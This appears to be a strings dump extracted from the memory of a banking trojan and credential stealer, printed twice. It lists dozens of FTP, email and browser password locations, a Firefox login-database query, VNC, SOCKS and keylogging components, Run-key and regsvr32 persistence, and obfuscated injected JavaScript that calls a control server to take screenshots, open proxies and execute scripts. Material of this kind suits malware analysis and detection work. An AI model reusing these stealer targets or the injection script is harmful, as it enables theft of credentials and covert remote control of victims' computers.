Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
N.UAE
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08
;&;,;3;^;
:$:,:7:?:
9”9C9
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
conhost.exe_2168_rwx_01150000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_2168_rwx_014D0000_0007E000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
